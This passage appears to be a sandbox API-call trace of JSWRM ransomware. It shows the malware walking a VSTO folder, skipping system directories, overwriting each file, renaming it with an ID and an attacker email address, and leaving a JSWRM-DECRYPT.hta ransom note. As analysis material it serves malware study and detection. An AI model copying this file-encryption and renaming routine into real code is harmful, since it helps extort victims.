hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.985] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0068.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0068.985] FindNextFileW (in: hFindFile=0x231b40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4a6fdac8, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0xbee8, dwReserved0=0x60002, dwReserved1=0x2264a0, cFileName="VSTOMessageProvider.dll", cAlternateFileName="VSTOME~1.DLL")) returned 0 [0068.985] FindClose (in: hFindFile=0x231b40 | out: hFindFile=0x231b40) returned 1 [0068.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0068.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225548 | out: hHeap=0x1e0000) returned 1 [0068.985] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224b30 | out: hHeap=0x1e0000) returned 1 [0068.985] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1fc1d2bf, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x1fc1d2bf, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x1fc43456, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0068.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0068.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0068.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0068.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0068.985] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0068.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0068.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0068.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0068.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0068.986] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0068.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0068.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x240f20, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0068.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0068.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2412e0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0068.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0068.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0068.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0068.986] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dbd6700, ftCreationTime.dwHighDateTime=0x1d0d7c4, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0x5dbd6700, ftLastWriteTime.dwHighDateTime=0x1d0d7c4, nFileSizeHigh=0x0, nFileSizeLow=0x29080, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="vstoee.dll", cAlternateFileName="")) returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2=".") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="..") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="...") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="windows") returned -1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="recovery") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="perflogs") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="documents and settings") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="$RECYCLE.BIN") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="system volume information") returned 1 [0068.986] lstrcmpiW (lpString1="vstoee.dll", lpString2="msocache") returned 1 [0068.986] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0068.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.986] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vstoee.dll", lpUsedDefaultChar=0x0) returned 10 [0068.986] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0068.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0068.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vstoee.dll", lpUsedDefaultChar=0x0) returned 10 [0068.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x2252a0 [0068.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.987] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x4298, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="vstoee100.tlb", cAlternateFileName="VSTOEE~1.TLB")) returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2=".") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="..") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="...") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="windows") returned -1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="recovery") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="perflogs") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="documents and settings") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="$RECYCLE.BIN") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="system volume information") returned 1 [0068.987] lstrcmpiW (lpString1="vstoee100.tlb", lpString2="msocache") returned 1 [0068.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0068.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee100.tlb", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee100.tlb", cchWideChar=13, lpMultiByteStr=0x345ef40, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vstoee100.tlb", lpUsedDefaultChar=0x0) returned 13 [0068.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0068.987] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0068.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee100.tlb", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0068.987] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee100.tlb", cchWideChar=13, lpMultiByteStr=0x345ef10, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vstoee100.tlb", lpUsedDefaultChar=0x0) returned 13 [0068.987] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0068.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.988] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2252a0 | out: hHeap=0x1e0000) returned 1 [0068.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.988] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.988] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.988] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.988] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=17048) returned 1 [0068.988] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.989] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4290) returned 0x24d1d8 [0068.989] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x4290, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x4290, lpOverlapped=0x0) returned 1 [0068.991] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.991] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x4290, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x4290, lpOverlapped=0x0) returned 1 [0068.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.992] CloseHandle (hObject=0x454) returned 1 [0068.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f84e8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0068.992] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0068.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.992] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0068.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.992] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.992] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee100.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee100.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0068.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.993] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2=".") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="..") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="...") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="windows") returned -1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="recovery") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="perflogs") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="documents and settings") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="$RECYCLE.BIN") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="system volume information") returned 1 [0068.993] lstrcmpiW (lpString1="vstoee90.tlb", lpString2="msocache") returned 1 [0068.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0068.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee90.tlb", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee90.tlb", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vstoee90.tlb", lpUsedDefaultChar=0x0) returned 12 [0068.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0068.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0068.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee90.tlb", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0068.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="vstoee90.tlb", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="vstoee90.tlb", lpUsedDefaultChar=0x0) returned 12 [0068.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0068.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2196c0 [0068.993] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0068.993] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0068.993] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0068.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0068.994] GetFileSizeEx (in: hFile=0x454, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=22680) returned 1 [0068.994] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.994] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5890) returned 0x24d1d8 [0068.994] ReadFile (in: hFile=0x454, lpBuffer=0x24d1d8, nNumberOfBytesToRead=0x5890, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesRead=0x345ec04*=0x5890, lpOverlapped=0x0) returned 1 [0068.997] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0068.997] WriteFile (in: hFile=0x454, lpBuffer=0x24d1d8*, nNumberOfBytesToWrite=0x5890, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24d1d8*, lpNumberOfBytesWritten=0x345ec00*=0x5890, lpOverlapped=0x0) returned 1 [0068.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0068.997] CloseHandle (hObject=0x454) returned 1 [0068.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x21f6d8 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0068.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x1f8328, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0068.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0068.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0068.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0068.997] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0068.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0068.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x1f10b0 [0068.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0068.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f10b0 | out: hHeap=0x1e0000) returned 1 [0068.997] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x1ff448 [0068.997] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0068.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0068.998] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb"), lpNewFileName="C:\\Program Files\\Common Files\\microsoft shared\\VSTO\\vstoee90.tlb.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\common files\\microsoft shared\\vsto\\vstoee90.tlb.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0068.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1ff448 | out: hHeap=0x1e0000) returned 1 [0068.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21f6d8 | out: hHeap=0x1e0000) returned 1 [0068.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0068.998] FindNextFileW (in: hFindFile=0x2321c0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd6340300, ftCreationTime.dwHighDateTime=0x1d0d6b2, ftLastAccessTime.dwLowDateTime=0x4ae972f5, ftLastAccessTime.dwHighDateTime=0x1d327e9, ftLastWriteTime.dwLowDateTime=0xd6340300, ftLastWriteTime.dwHighDateTime=0x1d0d6b2, nFileSizeHigh=0x0, nFileSizeLow=0x5898, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="vstoee90.tlb", cAlternateFileName="")) returned 0 [0068.998] FindClose (in: hFindFile=0x2321c0 | out: hFindFile=0x2321c0) returned 1 [0068.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2196c0 | out: hHeap=0x1e0000) returned 1 [0068.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0068.998] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2092d8 | out: hHeap=0x1e0000) returned 1 [0068.998] FindNextFileW (in: hFindFile=0x232180, lpFindFileData=0x345eff8 | out: lpFindFileData=0x345eff8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x49ecb94e, ftCreationTime.dwHighDateTime=0x1d327e9, ftLastAccessTime.dwLowDateTime=0x4ae972f5, 